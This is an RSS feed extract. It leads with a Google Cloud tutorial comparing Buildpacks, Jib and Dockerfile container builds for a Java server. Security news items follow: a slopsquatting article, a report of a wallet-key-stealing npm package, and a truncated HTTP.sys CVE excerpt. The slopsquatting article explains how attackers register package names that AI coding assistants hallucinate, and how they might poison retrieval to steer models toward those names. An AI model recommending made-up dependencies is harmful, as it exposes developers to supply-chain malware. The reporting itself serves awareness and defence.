<content:encoded><![CDATA[<div class="block-paragraph"><p>As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of the compiled Java classes and would run inside of a "container" running on the JVM. As long as your class files were compatible with the JVM and container, the app would just work.</p><p>That all worked great until people started building non-JVM stuff: Ruby, Python, NodeJS, Go, etc. Now we needed another way to package up apps so they could be run on production systems. To do this we needed some kind of virtualization layer that would allow anything to be run. Heroku was one of the first to tackle this and they used a Linux virtualization system called "lxc" - short for Linux Containers. Running a "container" on lxc was half of the puzzle because still a "container" needed to be created from source code, so Heroku invented what they called "Buildpacks" to create a standard way to convert source into a container.</p><p>A bit later a Heroku competitor named dotCloud was trying to tackle similar problems and went a different route which ultimately led to Docker, a standard way to create and run containers across platforms including Windows, Mac, Linux, Kubernetes, and Google Cloud Run. Ultimately the container specification behind Docker became a standard under the <a href="https://opencontainers.org/" target="_blank">Open Container Initiative (OCI)</a> and the virtualization layer switched from lxc to <a href="https://github.com/opencontainers/runc" target="_blank">runc</a> (also an OCI project).</p><p>The traditional way to build a Docker container is built into the <code>docker</code> tool and uses a sequence of special instructions usually in a file named <code>Dockerfile</code> to compile the source code and assemble the "layers" of a container image.</p><p>Yeah, this is confusing because we have all sorts of different "containers" and ways to run stuff in those containers. And there are also many ways to create the things that run in containers. The bit of history is important because it helps us categorize all of this into three parts:</p><ul><li>Container Builders - Turn source code into a Container Image</li><li>Container Images - Archive files containing a "runnable" application</li><li>Containers - Run Container Images</li></ul><p>With Java EE those three categories map to technologies like:</p><ul><li>Container Builders == Ant or Maven</li><li>Container Images == .jar, .war, or .ear</li><li>Containers == JBoss, WebSphere, WebLogic</li></ul><p>With Docker / OCI those three categories map to technologies like:</p><ul><li>Container Builders == Dockerfile, Buildpacks, or Jib</li><li>Container Images == .tar files usually not dealt with directly but through a "container registry"</li><li>Containers == Docker, Kubernetes, Cloud Run</li></ul><h3>Java Sample Application</h3>Let's explore the Container Builder options further on a little Java server application.  If you want to follow along, clone my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a>:<p><code>git clone https://github.com/jamesward/comparing-docker-methods.git</code><br></p><p><code>cd comparing-docker-methods</code></p><p></p><p>In that project you'll see a basic Java web server in <code>src/main/java/com/google/WebApp.java</code> that just responds with "hello, world" on a GET request to <code>/</code>. Here is the source:<br></p><p></p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'package com.google;\r\n\r\nimport com.sun.net.httpserver.HttpServer;\r\nimport java.io.IOException;\r\nimport java.io.OutputStream;\r\nimport java.net.InetSocketAddress;\r\n\r\npublic class WebApp {\r\n\r\n  public static void main(String[] args) throws IOException {\r\n    int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));\r\n    HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);\r\n\r\n    server.createContext("/", handler -&gt; {\r\n      byte[] response = "hello, world".getBytes();\r\n      handler.sendResponseHeaders(200, response.length);\r\n      try (OutputStream os = handler.getResponseBody()) {\r\n        os.write(response);\r\n      }\r\n    });\r\n\r\n    System.out.println("Listening at http://localhost:" + port);\r\n\r\n    server.start();\r\n  }\r\n}'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860670&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>This project uses Maven with a minimal <code>pom.xml</code> build config file for compiling and running the Java server:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;?xml version="1.0" encoding="UTF-8"?&gt;\r\n&lt;project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\r\n    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"&gt;\r\n  &lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;\r\n\r\n  &lt;groupId&gt;com.google&lt;/groupId&gt;\r\n  &lt;artifactId&gt;sample-java-mvn&lt;/artifactId&gt;\r\n  &lt;packaging&gt;jar&lt;/packaging&gt;\r\n  &lt;version&gt;0.1.0-SNAPSHOT&lt;/version&gt;\r\n\r\n  &lt;properties&gt;\r\n    &lt;maven.compiler.source&gt;8&lt;/maven.compiler.source&gt;\r\n    &lt;maven.compiler.target&gt;8&lt;/maven.compiler.target&gt;\r\n  &lt;/properties&gt;\r\n\r\n  &lt;build&gt;\r\n    &lt;plugins&gt;\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.codehaus.mojo&lt;/groupId&gt;\r\n        &lt;artifactId&gt;exec-maven-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;1.6.0&lt;/version&gt;\r\n        &lt;executions&gt;\r\n          &lt;execution&gt;\r\n            &lt;goals&gt;\r\n              &lt;goal&gt;java&lt;/goal&gt;\r\n            &lt;/goals&gt;\r\n          &lt;/execution&gt;\r\n        &lt;/executions&gt;\r\n        &lt;configuration&gt;\r\n          &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;\r\n        &lt;artifactId&gt;maven-jar-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;3.2.0&lt;/version&gt;\r\n        &lt;configuration&gt;\r\n          &lt;archive&gt;\r\n            &lt;manifest&gt;\r\n              &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n            &lt;/manifest&gt;\r\n          &lt;/archive&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n    &lt;/plugins&gt;\r\n  &lt;/build&gt;\r\n\r\n&lt;/project&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860c10&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to run this locally make sure you have Java 8 installed and from the project root directory, run:</p><p><code>./mvnw compile exec:java</code></p><p>You can test the server by visiting: <a href="http://localhost:8080/" target="_blank">http://localhost:8080</a></p><h3>Container Builder: Buildpacks</h3><p>We have an application that we can run locally so let's get back to those Container Builders. Earlier you learned that Heroku invented Buildpacks to create standard, polyglot ways to go from source to a Container Image. When Docker / OCI Containers started gaining popularity Heroku and Pivotal worked together to make their Buildpacks work with Docker / OCI Containers. That work is now a sandbox Cloud Native Computing Foundation project: <a href="https://buildpacks.io/" target="_blank">https://buildpacks.io/</a></p><p>To use Buildpacks you will need to <a href="https://docs.docker.com/get-started/" target="_blank">install Docker</a> and <a href="https://github.com/buildpacks/pack/releases" target="_blank">the pack tool</a>. Now from the command line tell Buildpacks to take your source and turn it into a Container Image:</p><p><code>pack build --builder=gcr.io/buildpacks/builder:v1 comparing-docker-methods:buildpacks</code></p><p>Magic! You didn't have to do anything and the Buildpacks knew how to turn that Java application into a Container Image. It even works on Go, NodeJS, Python, and .Net apps out-of-the-box. So what just happened?  Buildpacks inspect your source and try to identify it as something it knows how to build. In the case of our sample application it noticed the <code>pom.xml</code> file and decided it knows how to build Maven-based applications. The <code>--builder</code> flag told it where to get the Buildpacks from. In this case, <code>gcr.io/buildpacks/builder:v1</code> are the Container Image coordinates to <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks">Google Cloud's Buildpacks</a>. Alternatively you could use the Heroku or Paketo Buildpacks. The parameter <code>comparing-docker-methods:buildpacks</code> is the Container Image coordinates for where to store the output. In this case it stores on the local docker daemon. You can now run that Container Image locally with <code>docker</code>:</p><p><code>docker run -it -ePORT=8080 -p8080:8080 comparing-docker-methods:buildpacks</code></p><p>Of course you can also run that Container Image anywhere that runs Docker / OCI Containers like Kubernetes and Cloud Run.</p><p>Buildpacks are nice because in many cases they just work and you don't have to do anything special to turn your source into something runnable. But the resulting Container Images created from Buildpacks can be a bit bulky. Let's use a tool called <a href="https://github.com/wagoodman/dive" target="_blank"><code>dive</code></a> to examine what is in the created container image:</p><p><code>dive comparing-docker-methods:buildpacks</code></p><p></p><p></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_comparison.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Here you can see the Container Image has 11 layers and a total image size of 319MB. With <code>dive</code> you can explore each layer and see what was changed. In this Container Image the first 6 layers are the base operating system. Layer 7 is the JVM and layer 8 is our compiled application. Layering enables great caching so if only layer 8 changes, then layers 1 through 7 do not need to be re-downloaded. One downside of Buildpacks is how (at least for now) all of the dependencies and compiled application code are stored in a single layer. It would be better to have separate layers for the dependencies and the compiled application.</p><p>To recap, Buildpacks are the easy option that "just works" right out-of-the-box. But the Container Images are a bit large and not optimally layered.</p><h3>Container Builder: Jib</h3><p>The open source <a href="https://github.com/GoogleContainerTools/jib" target="_blank">Jib project</a> is a Java library for creating Container Images with Maven and Gradle plugins. To use it on a Maven project (like the one we from above), just add a build plugin to the <code>pom.xml</code> file:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;plugin&gt;\r\n    &lt;groupId&gt;com.google.cloud.tools&lt;/groupId&gt;\r\n    &lt;artifactId&gt;jib-maven-plugin&lt;/artifactId&gt;\r\n    &lt;version&gt;2.6.0&lt;/version&gt;\r\n&lt;/plugin&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d30&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Now a Container Image can be created and stored in the local docker daemon by running:</p><p><code>./mvnw compile jib:dockerBuild -Dimage=comparing-docker-methods:jib</code></p><p>Using <code>dive</code> we will see that the Container Image for this application is now only 127MB thanks to slimmer operating system and JVM layers. Also, on a Spring Boot application we can see how Jib layers the dependencies, resources, and compiled application for better caching:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Spring_Boot_Application.max-1000x1000.png" alt="Spring Boot Application">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>In this example the 18MB layer contains the runtime dependencies and the final layer contains the compiled application. Unlike with Buildpacks the original source code is not included in the Container Image. Jib also has a great feature where you can use it without docker being installed, as long as you store the Container Image on an external Container Registry (like DockerHub or the Google Cloud Container Registry). Jib is a great option with Maven and Gradle builds for Container Images that use the JVM.</p><h3>Container Builder: Dockerfile</h3><p>The traditional way to create Container Images is built into the <code>docker</code> tool and uses a sequence of instructions defined in a file usually named <code>Dockerfile</code>. Here is a <code>Dockerfile</code> you can use with the sample Java application:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM adoptopenjdk/openjdk8 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nFROM adoptopenjdk/openjdk8:jre\r\n\r\nCOPY --from=builder /app/target/*.jar /server.jar\r\n\r\nCMD ["java", "-jar", "/server.jar"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d90&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>In this example, the first four instructions start with the AdoptOpenJDK 8 Container Image and build the source to a Jar file. The final Container Image is created from the AdoptOpenJDK 8 JRE Container Image and includes the created Jar file. You can run <code>docker</code> to create the Container Image using the <code>Dockerfile</code> instructions:</p><p><code>docker build -t comparing-docker-methods:dockerfile </code></p><p>Using <code>dive</code> we can see a pretty slim Container Image at 209MB:<br></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Container_image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>With a <code>Dockerfile</code> we have full control over the layering and base images. For example, we could use the <a href="https://github.com/GoogleContainerTools/distroless/tree/master/java" target="_blank">Distroless Java base image</a> to trim down the Container Image even further. This method of creating Container Images provides a lot of flexibility but we do have to write and maintain the instructions.</p><p>With this flexibility we can do some cool stuff. For example, we can use GraalVM to create a "native image" of our application. This is an ahead-of-time compiled binary which can reduce startup time, reduce memory usage, and alleviate the need for a JVM in the Container Image. And we can go even further and create a statically linked native image which includes everything needed to run so that even an operating system is not needed in the Container Image. Here is the Dockerfile to do that:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM oracle/graalvm-ce:20.2.0-java11 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN gu install native-image\r\n\r\n# BEGIN PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n# SEE: https://github.com/oracle/graal/blob/master/substratevm/StaticImages.md\r\nARG RESULT_LIB="/staticlibs"\r\n\r\nRUN mkdir ${RESULT_LIB} &amp;&amp; \\\r\n    curl -L -o musl.tar.gz https://musl.libc.org/releases/musl-1.2.1.tar.gz &amp;&amp; \\\r\n    mkdir musl &amp;&amp; tar -xvzf musl.tar.gz -C musl --strip-components 1 &amp;&amp; cd musl &amp;&amp; \\\r\n    ./configure --disable-shared --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /muscl &amp;&amp; rm -f /musl.tar.gz &amp;&amp; \\\r\n    cp /usr/lib/gcc/x86_64-redhat-linux/4.8.2/libstdc++.a ${RESULT_LIB}/lib/\r\n\r\nENV PATH="$PATH:${RESULT_LIB}/bin"\r\nENV CC="musl-gcc"\r\n\r\nRUN curl -L -o zlib.tar.gz https://zlib.net/zlib-1.2.11.tar.gz &amp;&amp; \\\r\n   mkdir zlib &amp;&amp; tar -xvzf zlib.tar.gz -C zlib --strip-components 1 &amp;&amp; cd zlib &amp;&amp; \\\r\n   ./configure --static --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /zlib &amp;&amp; rm -f /zlib.tar.gz\r\n#END PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nRUN native-image \\\r\n  --static \\\r\n  --libc=musl \\\r\n  --no-fallback \\\r\n  --no-server \\\r\n  --install-exit-handlers \\\r\n  -H:Name=webapp \\\r\n  -cp /app/target/*.jar \\\r\n  com.google.WebApp\r\n\r\nFROM scratch\r\n\r\nCOPY --from=builder /app/webapp /webapp\r\n\r\nENTRYPOINT ["/webapp"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860df0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will see there is a bit of setup needed to support static native images. After that setup the Jar is compiled like before with Maven. Then the <code>native-image</code> tool creates the binary from the Jar. The <code>FROM scratch</code> instruction means the final container image will start with an empty one. The statically linked binary created by <code>native-image</code> is then copied into the empty container.</p><p>Like before you can use <code>docker</code> to build the Container Image:</p><p><code>docker build -t comparing-docker-methods:graalvm .</code></p><p>Using <code>dive</code> we can see the final Container Image is only 11MB!</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_Image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>And it starts up super fast because we don't need the JVM, OS, etc. Of course GraalVM is not always a great option as there are some challenges like dealing with reflection and debugging. You can read more about this in my blog, <a href="https://jamesward.com/2020/05/07/graalvm-native-image-tips-tricks/" target="_blank">GraalVM Native Image Tips &amp; Tricks</a>.</p><p>This example does capture the flexibility of the <code>Dockerfile</code> method and the ability to do anything you need. It is a great escape hatch when you need one.</p><h3>Which Method Should You Choose?</h3><p></p><ul><li>The easiest, polyglot method: Buildpacks</li><li>Great layering for JVM apps: Jib</li><li>The escape hatch for when those methods don't fit: Dockerfile</li></ul><p></p><p>Check out my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a> to explore these methods as well as the mentioned Spring Boot + Jib example.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Announcing Google Cloud buildpacks—container images made easy</h4>
            <p class="uni-related-article-tout__body">Google Cloud buildpacks make it much easier and faster to build applications on top of containers.</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Forget typosquatting; slopsquatting is the software supply chain threat created by AI coding tools]]></title>
<description><![CDATA[Slopsquatting represents an emerging supply chain threat made possible by AI hallucinations. As developers increasingly rely on AI coding assistants, they unknowingly grant cybercriminals access to their software from day one. Understanding what slopsquatting isSlopsquatting is a new type of supp...]]></description>
<link>https://tsecurity.de/de/3662303/it-nachrichten/forget-typosquatting-slopsquatting-is-the-software-supply-chain-threat-created-by-ai-coding-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662303/it-nachrichten/forget-typosquatting-slopsquatting-is-the-software-supply-chain-threat-created-by-ai-coding-tools/</guid>
<pubDate>Sat, 11 Jul 2026 20:32:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Slopsquatting represents an emerging supply chain threat made possible by AI hallucinations. As developers increasingly rely on AI coding assistants, they unknowingly grant <a href="https://venturebeat.com/security/prompt-injection-is-exploiting-enterprise-ais-biggest-design-flaws-by-targeting-agents-rag-pipelines-and-model-routers">cybercriminals</a> access to their software from day one. </p><h2><b>Understanding what slopsquatting is</b></h2><p>Slopsquatting is a new type of supply chain attack that uses large language model (LLM) <a href="https://www.captechu.edu/blog/ai-driven-threats-in-software-supply-chains"><u>hallucinations to inject malicious code</u></a> into development workflows. The term combines "AI slop" and "typosquatting," a deceptive practice where attackers register misspelled or lookalike versions of popular domains to prey on users who enter URLs incorrectly.</p><p>This novel attack vector exploits LLMs' tendency to generate fictitious software package names, which threat actors can then register and populate with malicious code.</p><p>During AI-assisted coding, the model may generate fake open-source packages — bundled collections of files, programs and installation tools. This alone is not necessarily harmful. However, if an attacker registers that fake package name, they can inject malware that gets incorporated directly into a developer's codebase.</p><h2><b>How AI creates a supply chain risk</b></h2><p>Traditionally, AI <a href="https://www.pivotpointsecurity.com/ai-security-and-ai-safety-how-do-they-relate/"><u>safety risks stem from hallucinations</u></a>, which can adversely affect users who treat misinformation as valid. However, those same hallucinations have evolved into exploitable security vulnerabilities.</p><p>Typosquatting is a deceptive practice where a cybercriminal registers a mispelled version of a popular package to trick developers. It has existed for decades, so registries have built protections against it. </p><p>However, AI has changed the <a href="https://venturebeat.com/security/claude-mythos-exposed-a-hard-truth-your-enterprise-patching-process-is-way-too-slow">threat model</a>. It recommends fictitious packages that sound plausible rather than making simple misspellings. Once attackers learn which hallucinated packages models tend to invent, they can register malware-filled packages under those names.</p><p>Since the hallucinated packages are not simply typoed versions of popular libraries, there are no protections against this practice at scale. For example, the registry protects against an attacker publishing "crossenv," a squat of the popular "cross-env" package. However, it would not identify "mpn install cross-env file" or "cross-env-extended" as threats.</p><h3><b>Hallucinations are persistent and severe</b></h3><p>Even if many LLMs recommend the same hallucinated package, widespread compromise is still possible. Malicious packages could remain undetected in production for months or even years, allowing threat actors to passively inject malware across countless environments. </p><p>One research <a href="https://arxiv.org/abs/2506.12995"><u>team analyzed 31,267 vulnerabilities</u></a> belonging to 14,675 packages across 10 programming languages. They discovered that reported vulnerabilities are increasing at an annual rate of 98%, faster growth than the 25% annual increase in the number of open-source software packages. The team also observed an 85% increase in the average lifespan of vulnerabilities, indicating a decline in security.</p><h3><b>Real-world dangers of AI hallucinations</b></h3><p><a href="https://venturebeat.com/security/ai-tool-poisoning-exposes-a-major-flaw-in-enterprise-agent-security">Malicious actors</a> can create open-access packages under the same name as commonly hallucinated libraries. Instead of standard code, they are filled with malware. The models believe they are referring to existing packages, so they often repeat the same hallucinated names. Since the hallucinations are not random, attackers could theoretically register packages that trick tens of thousands of developers.</p><p>These packages appear legitimate. String similarity to real libraries makes them recognizable. One-character typos suggest simple mistakes rather than malicious intent. Even fully fabricated names remain believable when the AI presents them in proper context. Detection is challenging, as developers trust their coding assistants to recommend valid dependencies.</p><h2><b>Why are LLMs hallucinating packages?</b></h2><p>LLMs generate the statistically most likely answer rather than prioritizing accuracy. Hallucinations are relatively common as a result. One study found hallucination rates <a href="https://www.nature.com/articles/s43856-025-01021-3"><u>range from 50% to 82%</u></a>, depending on the model and prompting method. Even GPT-4o, the best-performing model, goes no lower than 23%, even with prompt-based mitigation.</p><p>Adversarial hallucination attacks could worsen this problem. Threat actors can leverage token-level manipulation or retrieval poisoning to force models to hallucinate in ways they want, increasing the likelihood that models recommend their malicious packages.</p><h2><b>Which LLMs are prone to slopsquatting?</b></h2><p>While all LLMs are prone to slopsquatting, some are more vulnerable than others. The likelihood of producing hallucinated packages during code generation depends on the model. Proprietary models are four times less likely to generate hallucinated packages than open-source models.</p><p>One research group proved this by conducting 30 tests across 30 different systems. Out of <a href="https://arxiv.org/html/2406.10279v3"><u>the 576,000 code samples</u></a> and 2.23 million packages it produced, 19.7% were hallucinations. GPT-4.0 Turbo had a hallucination rate of 3.59%, while DeepSeek 1B, the best-performing open-source model, reached 13.63%.</p><p>This research suggests that organizations relying on open-source AI tools for code generation are roughly four times more exposed to slopsquatting attacks. That doesn’t necessarily mean proprietary tools will always remain safer, though. Once attackers realize this disparity, they may manipulate proprietary LLMs to take advantage of perceived safety.</p><h2><b>Vibe coding contributes to the problem</b></h2><p>Software developers who use AI tools estimate that <a href="https://shiftmag.dev/state-of-code-2025-7978/"><u>over 40 percent of the code</u></a> they commit includes AI assistance. They expect that percentage will increase considerably within the next few years. Already, 72% of those who have tried AI use it daily.</p><p>The uptick in vibe coding and AI-assisted coding amplifies the threat surface. As more developers integrate AI tools into their workflows without implementing proper verification processes, the attack surface for slopsquatting continues to expand.</p><p>For those using AI to assist with coding, double-checking output is essential. Verifying that recommended packages actually exist in official repositories before incorporating them into projects reduces risk.</p><h2><b>Navigating AI-assisted development</b></h2><p>Implementing automated checks that validate package names against known registries can help catch hallucinated packages before they enter production code. Security teams should also monitor for unusual package installations and maintain up-to-date threat intelligence on known slopsquatting campaigns.</p><p><i>Zac Amos is the Features Editor at </i><a href="https://rehack.com/"><i><u>ReHack</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Injective Labs GitHub Compromise Pushes Wallet-Key-Stealing npm Packages]]></title>
<description><![CDATA[Unknown threat actors compromised the Injective Labs SDK project’s GitHub repository and leveraged it to publish a malicious package on the npm registry to steal cryptocurrency wallet private keys and mnemonic seed phrases. The compromised version, @injectivelabs/sdk-ts@1.20.21, came embedded wit...]]></description>
<link>https://tsecurity.de/de/3660560/it-security-nachrichten/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660560/it-security-nachrichten/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/</guid>
<pubDate>Fri, 10 Jul 2026 20:08:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Unknown threat actors compromised the Injective Labs SDK project’s GitHub repository and leveraged it to publish a malicious package on the npm registry to steal cryptocurrency wallet private keys and mnemonic seed phrases. The compromised version, @injectivelabs/sdk-ts@1.20.21, came embedded with…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/">Injective Labs GitHub Compromise Pushes Wallet-Key-Stealing npm Packages</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Injective Labs GitHub Compromise Pushes Wallet-Key-Stealing npm Packages]]></title>
<description><![CDATA[Unknown threat actors compromised the Injective Labs SDK project's GitHub repository and leveraged it to publish a malicious package on the npm registry to steal cryptocurrency wallet private keys and mnemonic seed phrases.

The compromised version, @injectivelabs/sdk-ts@1.20.21, came embedded wi...]]></description>
<link>https://tsecurity.de/de/3660512/it-security-nachrichten/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660512/it-security-nachrichten/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/</guid>
<pubDate>Fri, 10 Jul 2026 19:41:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unknown threat actors compromised the Injective Labs SDK project's GitHub repository and leveraged it to publish a malicious package on the npm registry to steal cryptocurrency wallet private keys and mnemonic seed phrases.

The compromised version, @injectivelabs/sdk-ts@1.20.21, came embedded with fake telemetry functionality that exfiltrated data from cryptocurrency wallets. The version was]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47291: Remote Code Execution in the Windows HTTP.sys]]></title>
<description><![CDATA[In this excerpt of a TrendAI Research Services vulnerability report, Yazhi Wang and Jonathan Lein of the TrendAI Research team detail a recently patched remote code execution bug in the Windows HTTP protocol stack. Successful exploitation of this vulnerability can result in a denial-of-service co...]]></description>
<link>https://tsecurity.de/de/3659964/it-security-nachrichten/cve-2026-47291-remote-code-execution-in-the-windows-httpsys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659964/it-security-nachrichten/cve-2026-47291-remote-code-execution-in-the-windows-httpsys/</guid>
<pubDate>Fri, 10 Jul 2026 16:08:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class=""><em>In this excerpt of a TrendAI Research Services vulnerability report, Yazhi Wang and Jonathan Lein of the TrendAI Research team detail a recently patched remote code execution bug in the Windows HTTP protocol stack. Successful exploitation of this vulnerability can result in a denial-of-service condition, or, in the worst case, code execution with kernel privileges. The following is a portion of their write-up covering CVE-2026-47291, with a few minimal modifications.</em></p>





















  
  



<hr>



  <p class="">A remote code execution vulnerability exists in the HTTP Protocol Stack for Microsoft Internet Information Services implemented in HTTP.sys. The vulnerability is due to invalid validating incoming HTTP requests. </p><p class="">A remote, unauthenticated attacker can exploit this vulnerability by sending crafted HTTP packets to the target system. Successful exploitation of this vulnerability can result in a denial-of-service condition, or, in the worst case, code execution with kernel privileges.</p><p class=""><strong>The Vulnerability</strong></p><p class=""><em>HTTP.sys</em> is the kernel-mode HTTP protocol driver in Microsoft Windows. It provides HTTP request parsing, response caching, and SSL/TLS termination for Internet Information Services (IIS) and other applications that register URL prefixes. The driver listens on configured TCP ports (commonly 80 for HTTP and 443 for HTTPS) and processes inbound HTTP/1.x and HTTP/2 requests at the kernel level.</p><p class="">When operating over HTTPS, <em>HTTP.sys</em> delegates TLS processing to the Windows Secure Channel (SChannel) provider. Inbound TCP data is decrypted on a <a href="https://www.rfc-editor.org/info/rfc8446/">per-record basis</a>: each TLS record constitutes an independent unit of encryption and is decrypted separately by SChannel before being delivered to <em>HTTP.sys</em> as a distinct plaintext buffer. A single TLS 1.3 application data record has the following structure:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  






